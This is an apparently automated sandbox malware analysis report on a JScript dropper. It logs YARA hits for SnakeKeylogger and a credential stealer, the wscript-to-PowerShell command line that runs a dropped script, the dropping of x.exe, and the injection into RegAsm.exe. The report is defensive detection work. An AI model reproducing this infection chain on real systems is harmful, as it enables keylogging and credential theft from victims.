Source: 3.2.x.exe.4536e58.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.x.exe.4536e58.2.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.x.exe.454dc80.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.x.exe.454dc80.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.x.exe.4564aa0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.x.exe.4564aa0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.x.exe.454dc80.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.x.exe.454dc80.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.x.exe.4536e58.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.x.exe.4536e58.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000005.00000002.2954889614.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000003.00000002.1818233805.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: powershell.exe PID: 7500, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: x.exe PID: 7660, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegAsm.exe PID: 7704, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: x.exe.1.dr | Static PE information: section name: 6Fd:c#
Source: x.exe.1.dr | Static PE information: section name: (nameless section)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\x.exe
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe | COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 3_2_00E528D0
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 3_2_00E50848
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 3_2_00E511E0
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 3_2_00E528C1
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 3_2_00E50839
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 3_2_00E507C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02AAC168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02AACA58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02AA7E68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02AA4F08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02AAB9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02AA4EF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02AA7E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02AA2DD1
Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.x.exe.4564aa0.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.x.exe.4564aa0.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.x.exe.4536e58.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.x.exe.4536e58.2.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.x.exe.454dc80.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.x.exe.454dc80.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.x.exe.4564aa0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.x.exe.4564aa0.0.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.x.exe.454dc80.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.x.exe.454dc80.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.x.exe.4536e58.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.x.exe.4536e58.2.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.2954889614.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000003.00000002.1818233805.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 7500, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: x.exe PID: 7660, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegAsm.exe PID: 7704, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: x.exe.1.dr | Static PE information: Section: 6Fd:c# ZLIB complexity 1.0003925398284315
Source: classification engine | Classification label: mal100.spre.troj.spyw.expl.evad.winJSE@10/7@4/4
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\jqxrkk[1].ps1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7508:120:WilError_03
Source: C:\Windows\System32\wscript.exe | File created: C:\Temp\dddddd.ps1
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: RegAsm.exe, 00000005.00000002.2956937742.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2956937742.0000000002DB0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2956937742.0000000002DA0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 1C24TDP_000000029.jse | ReversingLabs: Detection: 13%
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1C24TDP_000000029.jse"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msxml3.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sspicli.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
